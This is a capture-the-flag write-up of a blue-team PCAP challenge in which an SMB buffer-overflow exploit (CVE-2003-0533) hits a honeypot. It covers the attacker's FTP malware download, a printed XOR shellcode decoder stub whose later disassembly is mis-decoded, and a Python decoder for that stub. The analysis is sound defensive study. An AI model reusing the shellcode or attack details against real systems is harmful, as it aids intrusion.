# HoneyBOT Blue Team Challenge

:::success
https://cyberdefenders.org/blueteam-ctf-challenges/45#nav-overview
:::

:::info
A PCAP analysis exercise highlighting attacker's interactions with honeypots and how automatic exploitation works. (Note that the IP address of the victim has been changed to hide the true location.)

As a SOC analyst, analyze the artifacts and answer the questions.

Tools:
- BrimSecurity
- NetworkMiner
- Wireshark
- Libemu (sctest)
- scdbg
- IP LookUp
:::

#### 1. What is the attacker's IP address?

```
98.114.205.102
```

Inspecting the packet contents: the server side is 192.150.11.111 with port 445 (SMB) open, and the attacker's source address is 98.114.205.102.

![Screenshot 2023-12-04 2.38.30 PM](https://hackmd.io/_uploads/rkVgNgiH6.jpg)

![Screenshot 2023-12-04 2.38.44 PM](https://hackmd.io/_uploads/BJN-VlsBa.jpg)

#### 2. What is the target's IP address?

```
192.150.11.111
```

Following on from the previous question, the server side is 192.150.11.111.

#### 3. Provide the country code for the attacker's IP address (a.k.a geo-location).

```
US
```

The GeoIP lookup result is US.

![Screenshot 2023-12-04 2.40.53 PM](https://hackmd.io/_uploads/HJrYEgjrp.jpg)

Reference: https://www.maxmind.com/en/geoip-demo

#### 4. How many TCP sessions are present in the captured traffic?

```
5
```

Using Conversations to inspect TCP, we can see there are 5 sessions.

![Screenshot 2023-12-04 2.53.47 PM](https://hackmd.io/_uploads/BkOYPlorT.jpg)

#### 5. How long did it take to perform the attack (in seconds)?

```
16
```

The capture spans 16 seconds.

![Screenshot 2023-12-04 2.55.52 PM](https://hackmd.io/_uploads/rJUWuesHT.jpg)

#### 7. Provide the CVE number of the exploited vulnerability.

```
CVE-2003-0533
```

Inspecting the protocols reveals DCE/RPC.

![Screenshot 2023-12-04 3.27.31 PM](https://hackmd.io/_uploads/SkE_JZira.jpg)

After filtering on dcerpc, the keyword DsRoleUpgradeDownlevelServer appears.

![Screenshot 2023-12-04 3.29.05 PM](https://hackmd.io/_uploads/SJbC1WsHp.jpg)

Searching for "DsRoleUpgradeDownlevelServer CVE 2003" leads to CVE-2003-0533 (MS04-011).

![Screenshot 2023-12-04 3.31.46 PM](https://hackmd.io/_uploads/HyADlbiSp.jpg)

Reference: https://vuldb.com/zh/?id.599

#### 8. Which protocol was used to carry over the exploit?

```
SMB
```

Following on from the previous question, the SMB protocol was used.

#### 9. Which protocol did the attacker use to download additional malicious files to the target system?

```
ftp
```

Following the TCP stream, we can see that after packet 44 a file is transferred over FTP.

![Screenshot 2023-12-04 4.34.46 PM](https://hackmd.io/_uploads/S1FV1Gorp.jpg)

#### 10. What is the name of the downloaded malware?

```
smss.exe
```

Same as the previous question.

#### 11. The attacker's server was listening on a specific port. Provide the port number.

```
8884
```

See the question before last.

#### 12. When was the involved malware first submitted to VirusTotal for analysis? Format: YYYY-MM-DD

```
2007-06-27
```

In packet 72 we can see executable content beginning with MZ; after following the TCP stream, save it as smss.exe.

![Screenshot 2023-12-04 4.54.06 PM](https://hackmd.io/_uploads/Sys3QfoBa.jpg)

![Screenshot 2023-12-04 4.53.02 PM](https://hackmd.io/_uploads/r1yK7fiHp.jpg)

Upload it to VirusTotal for scanning, and the first submission time is shown.

![Screenshot 2023-12-04 4.52.27 PM](https://hackmd.io/_uploads/B1w8mMsHa.jpg)

#### 13. What is the key used to encode the shellcode?

```
0x99
```

Searching shows that CVE-2003-0533 is a buffer overflow vulnerability; inspecting the packet contents, tcp.stream eq 1 shows what looks like a buffer overflow attack.

![Screenshot 2023-12-05 11.30.48 AM](https://hackmd.io/_uploads/rJDutfnH6.jpg)

The extracted overflow payload is as follows:

Decoding it with the online Assembler and Disassembler tool shows that it is XOR-encoded with 0x99.

![Screenshot 2023-12-05 11.52.38 AM](https://hackmd.io/_uploads/H1mc0fnHa.jpg)

The extracted attack shellcode is as follows:

```
0x0000000000000000: EB 10              jmp 0x12
0x0000000000000002: 5A                 pop rdx
0x0000000000000003: 4A 33 C9           xor rcx, rcx
0x0000000000000006: 66 B9 7D 01        mov cx, 0x17d
0x000000000000000a: 80 34 0A 99        xor byte ptr [rdx + rcx], 0x99
0x000000000000000e: E2 FA              loop 0xa
0x0000000000000010: EB 05              jmp 0x17
0x0000000000000012: E8 EB FF FF FF     call 2
0x0000000000000017: 70 95              jo 0xffffffffffffffae
0x0000000000000019: 98                 cwde
0x000000000000001a: 99                 cdq
0x000000000000001b: 99                 cdq
0x000000000000001c: C3                 ret
0x000000000000001d: FD                 std
0x000000000000001e: 38 A9 99 99 99 12  cmp byte ptr [rcx + 0x12999999], ch
0x0000000000000024: D9 95 12 E9 85 34  fst dword ptr [rbp + 0x3485e912]
0x000000000000002a: 12 D9              adc bl, cl
0x000000000000002c: 91                 xchg eax, ecx
0x000000000000002d: 12 41 12           adc al, byte ptr [rcx + 0x12]
```

Reference: https://shell-storm.org/online/Online-Assembler-and-Disassembler/?opcodes=488b59e0f6430f01740d49baa0d27672a57f000041ff23554889e556574883ec&arch=x86-64&endianness=little&dis_with_addr=True&dis_with_raw=True&dis_with_ins=True

#### 14. What is the port number the shellcode binds to?

```
1957
```

After the buffer overflow, the attacker can be seen connecting to port 1957.

![Screenshot 2023-12-05 12.11.01 PM](https://hackmd.io/_uploads/SyVyXX2BT.jpg)

The scdbg tool can be used to run and analyze the shellcode.

![Screenshot 2023-12-05 1.54.14 PM](https://hackmd.io/_uploads/rkMMi43Ha.jpg)

#### 15. The shellcode used a specific technique to determine its location in memory. What is the OS file being queried during this process?

```
kernel32.dll
```

Following on from the previous question, the shellcode repeatedly calls GetProcAddress during execution; looking it up shows that it is a function in kernel32.dll.

![Screenshot 2023-12-05 2.15.33 PM](https://hackmd.io/_uploads/rJzMgB3Sa.jpg)

Reference: https://learn.microsoft.com/zh-tw/windows/win32/api/libloaderapi/nf-libloaderapi-getprocaddress
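Returning to the decoder stub from question 13: as an added example (not part of the original writeup or the challenge materials), the following Python script locates the jmp/call/pop stub, reads the XOR key and body length out of the `mov cx, imm16` and `xor byte ptr [edx+ecx], imm8` instructions, and undoes the loop. It assumes the stub runs as 32-bit x86 (where byte `4A` is `dec edx`, so the loop touches exactly `count` bytes starting right after the `call`); the body it decodes is a constructed sample, not the captured payload, and `parse_stub`, `decode_body` and `build_sample` are names chosen here.

```python
import re
import struct

# Decoder stub from the capture (question 13): jmp/call/pop obtains the
# address of the encoded body, then `xor byte [edx+ecx], key` runs `count`
# times. The two-byte count (mov cx, imm16) and the one-byte key
# (xor ..., imm8) are captured so they can be read straight out of the stub.
STUB_RE = re.compile(
    rb"\xEB\x10"               # jmp  +0x10 (over the decoder, to the call)
    rb"\x5A"                   # pop  edx   (address right after the call)
    rb"\x4A"                   # dec  edx   (32-bit x86: DEC EDX)
    rb"\x33\xC9"               # xor  ecx, ecx
    rb"\x66\xB9(..)"           # mov  cx, count
    rb"\x80\x34\x0A(.)"        # xor  byte ptr [edx+ecx], key
    rb"\xE2\xFA"               # loop back to the xor
    rb"\xEB\x05"               # jmp  +5 (into the decoded body)
    rb"\xE8\xEB\xFF\xFF\xFF",  # call back to the pop
    re.DOTALL,
)


def parse_stub(blob: bytes):
    """Return (key, count, body_offset) for the first stub found, else None."""
    m = STUB_RE.search(blob)
    if m is None:
        return None
    count = struct.unpack("<H", m.group(1))[0]
    key = m.group(2)[0]
    return key, count, m.end()


def decode_body(blob: bytes) -> bytes:
    """Undo the XOR loop. After `dec edx`, ecx = count..1 touches exactly
    `count` bytes starting at the call's return address (the stub's end)."""
    found = parse_stub(blob)
    if found is None:
        raise ValueError("no jmp/call/pop XOR decoder stub found")
    key, count, off = found
    body = blob[off:off + count]
    if len(body) < count:
        raise ValueError(f"truncated: stub expects {count} bytes, got {len(body)}")
    return bytes(b ^ key for b in body)


def build_sample(plain: bytes, key: int) -> bytes:
    """Constructed test input (not the captured payload): the same stub layout
    with count and key patched in, followed by the XOR-encoded bytes."""
    stub = (b"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9" + struct.pack("<H", len(plain))
            + b"\x80\x34\x0A" + bytes([key]) + b"\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF")
    return stub + bytes(b ^ key for b in plain)
```

Running `parse_stub` over the 23 stub bytes shown in the disassembly above yields key 0x99 and a body length of 0x17d, which is what the loop count in `mov cx, 0x17d` encodes.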